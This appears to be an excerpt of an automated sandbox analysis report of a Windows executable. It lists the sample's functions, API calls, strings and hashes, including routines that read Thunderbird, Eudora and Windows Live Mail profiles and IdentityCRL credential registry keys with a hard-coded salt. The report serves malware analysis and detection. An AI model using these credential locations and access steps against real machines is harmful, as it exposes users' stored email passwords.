                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileFolderPathSpecialStringsatoisprintfstrcat
                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                  • API String ID: 1212093029-4223776976
                  • Opcode ID: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
                  • Instruction ID: 6d070b6b648a05e91db5632b048882ca6db18ac9797f22d42d855398ddad24fb
                  • Opcode Fuzzy Hash: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
                  • Instruction Fuzzy Hash: 8B91C772804159AEDB21E6958C45FDB7BAD9F18309F1400BBF608F2182EB789BC58B5D
                  Function 0040BB8D Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 169COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00404841: LoadLibraryA.KERNEL32(comctl32.dll,76F90A60,?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404860
                    • Part of subcall function 00404841: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
                    • Part of subcall function 00404841: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404886
                    • Part of subcall function 00404841: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004048B1
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040BDD9
                  • DeleteObject.GDI32(?), ref: 0040BDEF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$l4A$|EA
                  • API String ID: 745651260-3164406189
                  • Opcode ID: 3c00f802ca4795d2e9304cd0230107946e140242e0069c15af536683ec85def6
                  • Instruction ID: 8d811f0c9aed7e5f9a0d70865fafe098279c62815184764300974fb8b6b83255
                  • Opcode Fuzzy Hash: 3c00f802ca4795d2e9304cd0230107946e140242e0069c15af536683ec85def6
                  • Instruction Fuzzy Hash: A8618C71508345ABC720AFA1DC49A9BBBF9FF84705F00483FF545A22A0DB789904CB5E
                  Function 0040A88E Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 285windowregistrystringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00407D23: LoadMenuA.USER32(00000000), ref: 00407D2B
                    • Part of subcall function 00407D23: sprintf.MSVCRT ref: 00407D4E
                  • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0040A9C1
                  • #6.COMCTL32(50000000,0041344F,?,00000101), ref: 0040A9DC
                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A9F4
                  • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040AA0A
                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040AA34
                  • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040AA6A
                  • LoadIconA.USER32(00000066,00000000), ref: 0040AAD9
                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040AAE7
                  • _stricmp.MSVCRT(0041344F,/noloadsettings), ref: 0040AB31
                  • RegDeleteKeyA.ADVAPI32(80000001,0041344F), ref: 0040AB46
                  • SetFocus.USER32(?,00000000), ref: 0040AB6C
                  • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\), ref: 0040AB85
                  • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\), ref: 0040AB95
                  • strlen.MSVCRT ref: 0040AB9C
                  • strlen.MSVCRT ref: 0040ABAA
                  • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AC06
                    • Part of subcall function 0040492F: strlen.MSVCRT ref: 0040494C
                    • Part of subcall function 0040492F: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404970
                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AC51
                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AC64
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$Send$Loadstrlen$CreateIconImageWindow$AttributesCallbackDeleteDispatcherFileFocusList_MenuPathRegisterReplaceTempToolbarUser_stricmpsprintf
                  • String ID: /noloadsettings$C:\Users\user\AppData\Local\Temp\$O4A$SysListView32$commdlg_FindReplace$report.html
                  • API String ID: 2016272751-3164717526
                  • Opcode ID: b76aa5e4e0e99f284af308c1536f566fb802b9c2352f130d75eff2927cf6ca50
                  • Instruction ID: e1998a72efec4b56c1f9895f5ce6fdd1159dce7011e853ef75bd655fd4d55b37
                  • Opcode Fuzzy Hash: b76aa5e4e0e99f284af308c1536f566fb802b9c2352f130d75eff2927cf6ca50
                  • Instruction Fuzzy Hash: DBB10071644388EFEB16CF74C845BDABFB5BF14304F00406AF644A7292C7B9A954CB5A
                  Function 0040A02E Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A05B
                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A066
                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040A07B
                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040A090
                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A09B
                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040A0B0
                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A0BC
                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 0040A0C7
                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040A0E5
                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040A101
                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040A10D
                  • GetSysColor.USER32(0000000F), ref: 0040A111
                  • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 0040A12C
                  • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 0040A139
                  • DeleteObject.GDI32(?), ref: 0040A145
                  • DeleteObject.GDI32(00000000), ref: 0040A148
                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040A166
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                  • String ID:
                  • API String ID: 3411798969-0
                  • Opcode ID: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
                  • Instruction ID: 418605dbbba7a2bdca51e359c3d30d4779c94778b6a4b101a6c03afd9e8c1dd7
                  • Opcode Fuzzy Hash: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
                  • Instruction Fuzzy Hash: F13121716803087EFA316B709C47FD6BB95EB48B05F104829F3956A1E1CAF279909B18
                  Function 0040E057 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 282 40e057-40e08c call 412360 RegOpenKeyExA 285 40e092-40e0a6 RegOpenKeyExA 282->285 286 40e18e-40e194 282->286 287 40e184-40e188 RegCloseKey 285->287 288 40e0ac-40e0d5 RegQueryValueExA 285->288 287->286 289 40e17a-40e17e RegCloseKey 288->289 290 40e0db-40e0ea call 4047aa 288->290 289->287 290->289 293 40e0f0-40e128 call 40481b 290->293 293->289 296 40e12a-40e132 293->296 297 40e170-40e174 LocalFree 296->297 298 40e134-40e16b memcpy * 2 call 40dd59 296->298 297->289 298->297
                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E088
                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E0A2
                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E80,?), ref: 0040E0CD
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E80,?), ref: 0040E17E
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • memcpy.MSVCRT ref: 0040E13B
                  • memcpy.MSVCRT ref: 0040E150
                    • Part of subcall function 0040DD59: RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
                    • Part of subcall function 0040DD59: memset.MSVCRT ref: 0040DDA1
                    • Part of subcall function 0040DD59: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
                    • Part of subcall function 0040DD59: RegCloseKey.ADVAPI32(?), ref: 0040DEB6
                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E80,?), ref: 0040E174
                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E80,?), ref: 0040E188
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                  • API String ID: 2768085393-1693574875
                  • Opcode ID: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
                  • Instruction ID: a1b69f5673053fc040be98c60ebfc88e8990dfc0172556f981ec686efddd513d
                  • Opcode Fuzzy Hash: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
                  • Instruction Fuzzy Hash: 99313CB2504305AFD700DF51DC40E9BBBECEF88798F00493AFA94E2160D775DA598B6A
                  Function 0040B656 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 300 40b656-40b66b 301 40b7a1-40b7a8 300->301 302 40b671 300->302 303 40b7f1-40b7f3 call 40a632 301->303 304 40b7aa-40b7ab 301->304 305 40b793-40b79f call 40a5a1 302->305 306 40b677-40b67a 302->306 319 40b7f8-40b7fa call 40a3e9 303->319 307 40b7c0-40b7ef call 40a5a1 SetFocus 304->307 308 40b7ad-40b7b0 304->308 305->319 311 40b680-40b683 306->311 312 40b769-40b76e 306->312 307->319 315 40b7b2-40b7be SetFocus 308->315 316 40b7ff-40b805 308->316 313 40b689-40b68c 311->313 314 40b73d-40b746 311->314 317 40b770-40b783 PostMessageA 312->317 318 40b785-40b791 GetFocus 312->318 323 40b6b8-40b6c4 313->323 324 40b68e-40b691 313->324 314->316 326 40b74c-40b764 LoadCursorA SetCursor 314->326 315->316 321 40b837-40b840 call 401939 316->321 322 40b807-40b816 316->322 317->316 318->316 319->316 333 40b845-40b849 321->333 328 40b818-40b81d call 409ee8 322->328 329 40b81f-40b822 322->329 323->316 332 40b6ca-40b738 SetBkMode SetTextColor SelectObject DrawTextExA SelectObject 323->332 324->316 330 40b697-40b6a6 324->330 326->333 328->321 329->321 336 40b824-40b831 SetFocus 329->336 330->316 335 40b6ac-40b6b3 call 40b48c 330->335 332->316 335->316 336->321
                  APIs
                  • SetBkMode.GDI32(?,00000001), ref: 0040B6CF
                  • SetTextColor.GDI32(?,00FF0000), ref: 0040B6DD
                  • SelectObject.GDI32(?,?), ref: 0040B6F2
                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B727
                  • SelectObject.GDI32(00000014,?), ref: 0040B733
                    • Part of subcall function 0040B48C: GetCursorPos.USER32(?), ref: 0040B499
                    • Part of subcall function 0040B48C: GetSubMenu.USER32(?,00000000), ref: 0040B4A7
                    • Part of subcall function 0040B48C: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B4D4
                  • LoadCursorA.USER32(00000067), ref: 0040B754
                  • SetCursor.USER32(00000000), ref: 0040B75B
                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040B77D
                  • SetFocus.USER32(?), ref: 0040B7B8
                  • SetFocus.USER32(?), ref: 0040B831
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                  • String ID:
                  • API String ID: 1416211542-0
                  • Opcode ID: 3778869b55221fcc12fd94bbd8486a161371f0d47134fd12c30968efd1e1df11
                  • Instruction ID: bf574778d17b78baaeffb7f566a8ea64d240ccb0deb227a445330b453fade6b9
                  • Opcode Fuzzy Hash: 3778869b55221fcc12fd94bbd8486a161371f0d47134fd12c30968efd1e1df11
                  • Instruction Fuzzy Hash: 4A519271100605EFCB15EF69CC88AEA7BA5FF44301F10443AF615AB2A1CB38AD51DB9D
                  Function 0041211A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 343 41211a-412136 call 412308 GetModuleHandleA 346 412157-41215a 343->346 347 412138-412143 343->347 349 412183-4121d0 __set_app_type __p__fmode __p__commode call 412304 346->349 347->346 348 412145-41214e 347->348 351 412150-412155 348->351 352 41216f-412173 348->352 356 4121d2-4121dd __setusermatherr 349->356 357 4121de-412238 call 4122f2 _initterm __getmainargs _initterm 349->357 351->346 354 41215c-412163 351->354 352->346 355 412175-412177 352->355 354->346 358 412165-41216d 354->358 359 41217d-412180 355->359 356->357 362 412274-412277 357->362 363 41223a-412242 357->363 358->359 359->349 366 412251-412255 362->366 367 412279-41227d 362->367 364 412244-412246 363->364 365 412248-41224b 363->365 364->363 364->365 365->366 368 41224d-41224e 365->368 369 412257-412259 366->369 370 41225b-41226c GetStartupInfoA 366->370 367->362 368->366 369->368 369->370 371 41227f-412281 370->371 372 41226e-412272 370->372 373 412282-412289 GetModuleHandleA call 40bb8d 371->373 372->373 375 41228e-412296 373->375 376 412298-412299 exit 375->376 377 41229f-4122df _cexit call 412341 375->377 376->377
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                  • String ID:
                  • API String ID: 3662548030-0
                  • Opcode ID: 0cd59659463b3ba6b54fd34f3b5747a647caaa08127f994ca48f4bf1f9d9109b
                  • Instruction ID: c2e845550ef1ad64eb6aea8f75856b2ed0c0391cefdfa0dcc66b3553e8bd0076
                  • Opcode Fuzzy Hash: 0cd59659463b3ba6b54fd34f3b5747a647caaa08127f994ca48f4bf1f9d9109b
                  • Instruction Fuzzy Hash: 46419070D04249EFCB209FA4D9496ED7BB4EB09315F2081BBE861D7291D7B859D2CB1C
                  Function 004113C4 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 004113E5
                    • Part of subcall function 0040F4CA: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 0040F501
                    • Part of subcall function 00406763: strlen.MSVCRT ref: 00406765
                    • Part of subcall function 00406763: strlen.MSVCRT ref: 00406770
                    • Part of subcall function 00406763: strcat.MSVCRT(00000000,0041140D,0000001C,0041140D,\Microsoft\Windows Mail,?,?,?), ref: 00406787
                    • Part of subcall function 0040F4CA: memset.MSVCRT ref: 0040F51F
                    • Part of subcall function 0040F4CA: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                    • Part of subcall function 0040F4CA: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                  • memset.MSVCRT ref: 00411453
                  • memset.MSVCRT ref: 0041146E
                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004114A7
                  • strlen.MSVCRT ref: 004114B5
                  • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 004114DB
                  Strings
                  • \Microsoft\Windows Mail, xrefs: 00411403
                  • Store Root, xrefs: 0041147F
                  • \Microsoft\Windows Live Mail, xrefs: 0041142A
                  • Software\Microsoft\Windows Live Mail, xrefs: 00411484
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_stricmpstrcatstrcpy
                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                  • API String ID: 4292528749-2578778931
                  • Opcode ID: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
                  • Instruction ID: e9664ad0f3b84b924b74ee59ba002f7e9f43dcf230935329a4dad2143823624c
                  • Opcode Fuzzy Hash: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
                  • Instruction Fuzzy Hash: 45317772504348ABD320EBA9DD46FCB7BDC9B88714F00442FF649D7182EA78D55487AA
                  Function 0040B91E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71stringwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 402 40b91e-40b94d ??2@YAPAXI@Z 403 40b956 402->403 404 40b94f-40b954 402->404 405 40b958-40b96b ??2@YAPAXI@Z 403->405 404->405 406 40b976 405->406 407 40b96d-40b974 call 404026 405->407 409 40b978-40b99e 406->409 407->409 411 40b9a0-40b9a7 DeleteObject 409->411 412 40b9ad-40ba20 call 40625c call 4019da memset LoadIconA call 4019da strcpy 409->412 411->412
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@$DeleteIconLoadObjectmemsetstrcpy
                  • String ID: xDA
                  • API String ID: 3205015851-812456957
                  • Opcode ID: ad96368dabae8c74e1e24747d7fbaeb21c173cde6fa866393d14417aa5932aab
                  • Instruction ID: 1611dc68708d9a603d76385fea93fddb5fcd3a07b13b65f331774950c43fbb3a
                  • Opcode Fuzzy Hash: ad96368dabae8c74e1e24747d7fbaeb21c173cde6fa866393d14417aa5932aab
                  • Instruction Fuzzy Hash: 9C2192F19002509BCB50EF758E897C97BA8AB44705F1444BBEE0CEF296D7B845818BAD
                  Function 0040378B Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 419 40378b-4037dd memset * 2 call 411622 422 4038a3-4038a6 419->422 423 4037e3-403843 call 402197 call 4060da * 2 strchr 419->423 430 403845-403856 strcpy 423->430 431 403858-403863 strlen 423->431 432 403880-40389e strcpy call 4023c6 430->432 431->432 433 403865-40387d sprintf 431->433 432->422 433->432
                  APIs
                  • memset.MSVCRT ref: 004037AC
                  • memset.MSVCRT ref: 004037C0
                    • Part of subcall function 00411622: memset.MSVCRT ref: 00411644
                    • Part of subcall function 00411622: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                  • strchr.MSVCRT ref: 0040382F
                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040384C
                  • strlen.MSVCRT ref: 00403858
                  • sprintf.MSVCRT ref: 00403878
                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040388E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                  • String ID: %s@yahoo.com
                  • API String ID: 1649821605-3288273942
                  • Opcode ID: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                  • Instruction ID: fac56a1422f5c84d721e9c9d17906f33e473bda0e694fa5a8ecc328811f6b8f6
                  • Opcode Fuzzy Hash: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                  • Instruction Fuzzy Hash: 952186B3D0012C6EDB21EA54DD41BDA77AC9F45348F0401EBF649F6181E6B8AF848F69
                  Function 0040A7B2 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetClientRect.USER32(?,?), ref: 0040A7D1
                  • GetWindowRect.USER32(?,?), ref: 0040A7E7
                  • GetWindowRect.USER32(?,?), ref: 0040A7FA
                  • BeginDeferWindowPos.USER32(00000003), ref: 0040A817
                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A834
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A854
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A87B
                  • KiUserCallbackDispatcher.NTDLL(?), ref: 0040A884
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$Defer$Rect$BeginCallbackClientDispatcherUser
                  • String ID:
                  • API String ID: 466569379-0
                  • Opcode ID: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                  • Instruction ID: 09cbeee5e8014f0efd252c30326660bc7ddd54a992e069e65e32613af5811a3b
                  • Opcode Fuzzy Hash: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                  • Instruction Fuzzy Hash: AF21C871A00209FFDB11DFA8DD89FEEBBB9FB08311F104465FA55A2160CA71AA519B24
                  Function 0040B84C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0040B86E
                  • memset.MSVCRT ref: 0040B882
                  • RegisterClassA.USER32(?), ref: 0040B8C5
                    • Part of subcall function 004019DA: strncat.MSVCRT ref: 004019FA
                  • CreateWindowExA.USER32(00000000,00000000,00000000,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,?), ref: 0040B908
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
